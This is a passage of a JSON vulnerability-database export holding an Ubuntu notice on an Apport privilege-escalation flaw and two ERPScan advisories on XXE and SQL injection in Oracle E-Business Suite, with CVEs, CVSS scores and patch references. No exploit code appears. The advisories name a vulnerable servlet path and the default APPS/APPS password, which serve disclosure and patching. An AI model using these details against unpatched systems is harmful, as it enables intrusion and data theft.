reports for debugging\r\n\r\nDetails:\r\n\r\nGabriel Campana discovered that Apport incorrectly handled Python module\r\nimports. A local attacker could use this issue to elevate privileges.\r\n\r\nUpdate instructions:\r\n\r\nThe problem can be corrected by updating your system to the following\r\npackage versions:\r\n\r\nUbuntu 15.10:\r\n apport 2.19.1-0ubuntu4\r\n\r\nUbuntu 15.04:\r\n apport 2.17.2-0ubuntu1.7\r\n\r\nUbuntu 14.04 LTS:\r\n apport 2.14.1-0ubuntu3.18\r\n\r\nUbuntu 12.04 LTS:\r\n apport 2.0.1-0ubuntu17.13\r\n\r\nIn general, a standard system update will make all the necessary changes.\r\n\r\nReferences:\r\n http://www.ubuntu.com/usn/usn-2782-1\r\n CVE-2015-1341\r\n\r\nPackage Information:\r\n https://launchpad.net/ubuntu/+source/apport/2.19.1-0ubuntu4\r\n https://launchpad.net/ubuntu/+source/apport/2.17.2-0ubuntu1.7\r\n https://launchpad.net/ubuntu/+source/apport/2.14.1-0ubuntu3.18\r\n https://launchpad.net/ubuntu/+source/apport/2.0.1-0ubuntu17.13\r\n\r\n\r\n\r\n\r\n-- \r\nubuntu-security-announce mailing list\r\nubuntu-security-announce@lists.ubuntu.com\r\nModify settings or unsubscribe at: https://lists.ubuntu.com/mailman/listinfo/ubuntu-security-announce\r\n\r\n", "edition": 1, "reporter": "Securityvulns", "published": "2015-11-02T00:00:00", "title": "[USN-2782-1] Apport vulnerability", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:11:02", "vector": "NONE", "value": 7.2}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2015-1341"], "modified": "2015-11-02T00:00:00", "id": "SECURITYVULNS:DOC:32660", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32660", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:11:02", "references": [], "description": "\r\n\r\n1. ADVISORY INFORMATION\r\n\r\nTitle: Oracle E-Business Suite XXE injection\r\nAdvisory ID: [ERPSCAN-15-030]\r\nAdvisory URL: http://erpscan.com/advisories/erpscan-15-030-oracle-e-business-suite-xxe-injection-vulnerability/\r\nDate published: 20.10.2015\r\nVendors contacted: Oracle\r\n\r\n2. VULNERABILITY INFORMATION\r\n\r\nClass: XML External Entity [CWE-611]\r\nImpact: information disclosure, DoS, SSRF, NTLM relay\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nCVE Name: CVE-2015-4851\r\nCVSS Information\r\nCVSS Base Score: 6.8 / 10\r\nAV : Access Vector &#40;Related exploit range&#41; Network &#40;N&#41;\r\nAC : Access Complexity &#40;Required attack complexity&#41; Medium &#40;M&#41;\r\nAu : Authentication &#40;Level of authentication needed to exploit&#41; None &#40;N&#41;\r\nC : Impact to Confidentiality Partial &#40;P&#41;\r\nI : Impact to Integrity Partial &#40;P&#41;\r\nA : Impact to Availability Partial &#40;P&#41;\r\n\r\n3. VULNERABILITY DESCRIPTION\r\n\r\n1&#41; An attacker can read an arbitrary file on a server by sending a\r\ncorrect XML request with a crafted DTD and reading the response from\r\nthe service.\r\n2&#41; An attacker can perform a DoS attack &#40;for example, XML Entity Expansion&#41;.\r\n3&#41; An SMB Relay attack is a type of Man-in-the-Middle attack where the\r\nattacker asks the victim to authenticate into a machine controlled by\r\nthe attacker, then relays the credentials to the target. The attacker\r\nforwards the authentication information both ways and gets access.\r\n\r\n4. VULNERABLE PACKAGES\r\n\r\nOracle E-Business Suite 12.1.3\r\n\r\nOther versions are probably affected too, but they were not checked.\r\n\r\n5. SOLUTIONS AND WORKAROUNDS\r\n\r\nInstall Oracle CPU October 2015\r\n\r\n6. AUTHOR\r\nNikita Kelesis, Ivan Chalykin, Alexey Tyurin &#40;ERPScan&#41;\r\n\r\n7. TECHNICAL DESCRIPTION\r\n\r\nVulnerable servlet:\r\n/OA_HTML/oramipp_lpr\r\n\r\n\r\n8. REPORT TIMELINE\r\n\r\nReported: 17.07.2015\r\nVendor response: 24.07.2015\r\nDate of Public Advisory: 20.10.2015\r\n\r\n9. REFERENCES\r\n\r\nhttp://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html\r\nhttp://erpscan.com/advisories/erpscan-15-030-oracle-e-business-suite-xxe-injection-vulnerability/\r\n\r\n10. ABOUT ERPScan Research\r\nThe company\u2019s expertise is based on the research subdivision of\r\nERPScan, which is engaged in vulnerability research and analysis of\r\ncritical enterprise applications. It has achieved multiple\r\nacknowledgments from the largest software vendors like SAP, Oracle,\r\nMicrosoft, IBM, VMware, HP for discovering more than 400\r\nvulnerabilities in their solutions &#40;200 of them just in SAP!&#41;.\r\nERPScan researchers are proud to have exposed new types of\r\nvulnerabilities &#40;TOP 10 Web Hacking Techniques 2012&#41; and to be\r\nnominated for the best server-side vulnerability at BlackHat 2013.\r\nERPScan experts have been invited to speak, present, and train at 60+\r\nprime international security conferences in 25+ countries across the\r\ncontinents. These include BlackHat, RSA, HITB, and private SAP\r\ntrainings in several Fortune 2000 companies.\r\nERPScan researchers lead the project EAS-SEC, which is focused on\r\nenterprise application security research and awareness. They have\r\npublished 3 exhaustive annual award-winning surveys about SAP\r\nsecurity.\r\nERPScan experts have been interviewed by leading media resources and\r\nfeatured in specialized info-sec publications worldwide. These include\r\nReuters, Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading,\r\nHeise, and Chinabyte, to name a few.\r\nWe have highly qualified experts in staff with experience in many\r\ndifferent fields of security, from web applications and\r\nmobile/embedded to reverse engineering and ICS/SCADA systems,\r\naccumulating their experience to conduct the best SAP security\r\nresearch.\r\n\r\n\r\n11. ABOUT ERPScan\r\nERPScan is one of the most respected and credible Business Application\r\nSecurity providers. Founded in 2010, the company operates globally.\r\nNamed an Emerging vendor in Security by CRN and distinguished by more\r\nthan 25 other awards, ERPScan is the leading SAP SE partner in\r\ndiscovering and resolving security vulnerabilities. ERPScan\r\nconsultants work with SAP SE in Walldorf to improve the security of\r\ntheir latest solutions.\r\nERPScan\u2019s primary mission is to close the gap between technical and\r\nbusiness security. We provide solutions to secure ERP systems and\r\nbusiness-critical applications from both cyber attacks and internal\r\nfraud. Our clients are usually large enterprises, Fortune 2000\r\ncompanies, and managed service providers whose requirements are to\r\nactively monitor and manage the security of vast SAP landscapes on a\r\nglobal scale.\r\nOur flagship product is ERPScan Security Monitoring Suite for SAP.\r\nThis multi award-winning innovative software is the only solution on\r\nthe market certified by SAP SE covering all tiers of SAP security:\r\nvulnerability assessment, source code review, and Segregation of\r\nDuties.\r\nThe largest companies from diverse industries like oil and gas,\r\nbanking, retail, even nuclear power installations as well as\r\nconsulting companies have successfully deployed the software. ERPScan\r\nSecurity Monitoring Suite for SAP is specifically designed for\r\nenterprises to continuously monitor changes in multiple SAP systems.\r\nIt generates and analyzes trends in user friendly dashboards, manages\r\nrisks, tasks, and can export results to external systems. These\r\nfeatures enable central management of SAP system security with minimal\r\ntime and effort.\r\nWe follow the sun and function in two hubs located in the Netherlands\r\nand the US to operate local offices and partner network spanning 20+\r\ncountries around the globe. This enables monitoring cyber threats in\r\nreal time and providing agile customer support.\r\n\r\nAdress USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301\r\nPhone: 650.798.5255\r\nTwitter: @erpscan\r\nScoop-it: Business Application Security\r\n\r\n", "edition": 1, "reporter": "Securityvulns", "published": "2015-11-02T00:00:00", "title": "[ERPSCAN-15-030] Oracle E-Business Suite - XXE injection Vulnerability", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:11:02", "vector": "NONE", "value": 7.2}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2015-4851"], "modified": "2015-11-02T00:00:00", "id": "SECURITYVULNS:DOC:32655", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32655", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:11:02", "references": [], "description": "\r\n\r\n1. ADVISORY INFORMATION\r\n\r\nTitle: Oracle E-Business Suite SQL injection\r\nAdvisory ID: [ERPSCAN-15-026]\r\nAdvisory URL: http://erpscan.com/advisories/erpscan-15-026-oracle-e-business-suite-sql-injection-vulnerability/\r\nDate published: 20.10.2015\r\nVendors contacted: Oracle\r\n\r\n2. VULNERABILITY INFORMATION\r\n\r\nClass: SQL injection\r\nImpact: SQL injection, RCE\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nCVE Name: CVE-2015-4846\r\nCVSS Information\r\nCVSS Base Score: 3.6 / 10\r\nAV : Access Vector &#40;Related exploit range&#41; Network &#40;N&#41;\r\nAC : Access Complexity &#40;Required attack complexity&#41; High &#40;H&#41;\r\nAu : Authentication &#40;Level of authentication needed to exploit&#41; Single &#40;S&#41;\r\nC : Impact to Confidentiality Partial &#40;P&#41;\r\nI : Impact to Integrity Partial &#40;P&#41;\r\nA : Impact to Availability None &#40;N&#41;\r\n\r\n3. VULNERABILITY DESCRIPTION\r\n\r\nThe problem is caused by an SQL injection vulnerability. The code\r\ncomprises an SQL statement that contains strings that can be altered\r\nby an attacker. The manipulated SQL statement can then be used to\r\nretrieve additional data from the database or to modify the data.\r\n\r\n4. VULNERABLE PACKAGES\r\n\r\nOracle E-Business Suite 12.1.3, 12.1.4\r\n\r\nOther versions are probably affected too, but they were not checked.\r\n\r\n5. SOLUTIONS AND WORKAROUNDS\r\n\r\nInstall Oracle CPU October 2015\r\n\r\n6. AUTHOR\r\nNikita Kelesis, Ivan Chalykin, Alexey Tyurin, Egor Karbutov &#40;ERPScan&#41;\r\n\r\n7. TECHNICAL DESCRIPTION\r\n\r\nOne of SQL extensions &#40;afamexts.sql&#41; does not filter user input values\r\nwhich may lead to SQL injection. The only defense mechanism is a\r\npassword for APPS. If an attacker knows the password &#40;for example,\r\ndefault password APPS/APPS&#41;, he will be able to exploit SQL injection\r\nwith high privilege.\r\n\r\n\r\n8. REPORT TIMELINE\r\n\r\nReported: 17.07.2015\r\nVendor response: 24.07.2015\r\nDate of Public Advisory: 20.10.2015\r\n\r\n9. REFERENCES\r\n\r\nhttp://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html\r\nhttp://erpscan.com/advisories/erpscan-15-026-oracle-e-business-suite-sql-injection-vulnerability/\r\nhttp://erpscan.com/press-center/press-release/erpscan-took-a-closer-look-at-oracle-ebs-security-6-vulnerabilities-patched-in-recent-update/\r\n\r\n10. ABOUT ERPScan Research\r\nThe company\u2019s expertise is based on the research subdivision of\r\nERPScan, which is engaged in vulnerability research and analysis of\r\ncritical enterprise applications. It has achieved multiple\r\nacknowledgments from the largest software vendors like SAP, Oracle,\r\nMicrosoft, IBM, VMware, HP for discovering more than 400\r\nvulnerabilities in their solutions &#40;200 of them just in SAP!&#41;.\r\nERPScan researchers are proud to have exposed new types of\r\nvulnerabilities &#40;TOP 10 Web Hacking Techniques 2012&#41; and to be\r\nnominated for the best server-side vulnerability at BlackHat 2013.\r\nERPScan experts have been invited to speak, present, and train at 60+\r\nprime international security conferences in 25+ countries across the\r\ncontinents. These include BlackHat, RSA, HITB, and private SAP\r\ntrainings in several Fortune 2000 companies.\r\nERPScan researchers lead the project EAS-SEC, which is focused on\r\nenterprise application security research and awareness. They have\r\npublished 3 exhaustive annual award-winning surveys about SAP\r\nsecurity.\r\nERPScan experts have been interviewed by leading media resources and\r\nfeatured in specialized info-sec publications worldwide. These include\r\nReuters, Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading,\r\nHeise, and Chinabyte, to name a few.\r\nWe have highly qualified experts in staff with experience in many\r\ndifferent fields of security, from web applications and\r\nmobile/embedded to reverse engineering and ICS/SCADA systems,\r\naccumulating their experience to conduct the best SAP security\r\nresearch.\r\n\r\n\r\n11. ABOUT ERPScan\r\nERPScan is one of the most respected and credible Business Application\r\nSecurity providers. Founded in 2010, the company operates globally.\r\nNamed an Emerging vendor in Security by CRN and distinguished by more\r\nthan 25 other awards, ERPScan is the leading SAP SE partner in\r\ndiscovering and resolving security vulnerabilities. ERPScan\r\nconsultants work with SAP SE in Walldorf to improve the security of\r\ntheir latest solutions.\r\nERPScan\u2019s primary mission is to close the gap between technical and\r\nbusiness security. We provide solutions to secure ERP systems and\r\nbusiness-critical applications from both cyber attacks and internal\r\nfraud. Our clients are usually large enterprises, Fortune 2000\r\ncompanies, and managed service providers whose requirements are to\r\nactively monitor and manage the security of vast SAP landscapes on a\r\nglobal scale.\r\nOur flagship product is ERPScan Security Monitoring Suite for SAP.\r\nThis multi award-winning innovative software is the only solution on\r\nthe market certified by SAP SE covering all tiers of SAP security:\r\nvulnerability assessment, source code review, and Segregation of\r\nDuties.\r\nThe largest companies from diverse industries like oil and gas,\r\nbanking, retail, even nuclear power installations as well as\r\nconsulting companies have successfully deployed the software. ERPScan\r\nSecurity Monitoring Suite for SAP is specifically designed for\r\nenterprises to continuously monitor changes in multiple SAP systems.\r\nIt generates and analyzes trends in user friendly dashboards, manages\r\nrisks, tasks, and can export results to external systems. These\r\nfeatures enable central management of SAP system security with minimal\r\ntime and effort.\r\nWe follow the sun and function in two hubs located in the Netherlands\r\nand the US to operate local offices and partner network spanning 20+\r\ncountries around the globe. This enables monitoring cyber threats in\r\nreal time and providing agile customer support.\r\n\r\nAdress USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301\r\nPhone: 650.798.5255\r\nTwitter: @erpscan\r\nScoop-it: Business Application Security\r\n\r\n", "edition": 1, "reporter": "Securityvulns", "published": "2015-11-02T00:00:00", "title": "[ERPSCAN-15-026] Oracle E-Business Suite - SQL injection Vulnerability", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:11:02", "vector": "NONE", "value": 7.5}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2015-4846"], "modified": "2015-11-02T00:00:00", "id": "SECURITYVULNS:DOC:32657", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32657", "cvss": {"score": 3.6, "vector": "AV:NETWORK/AC:HIGH/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:NONE/"}}]}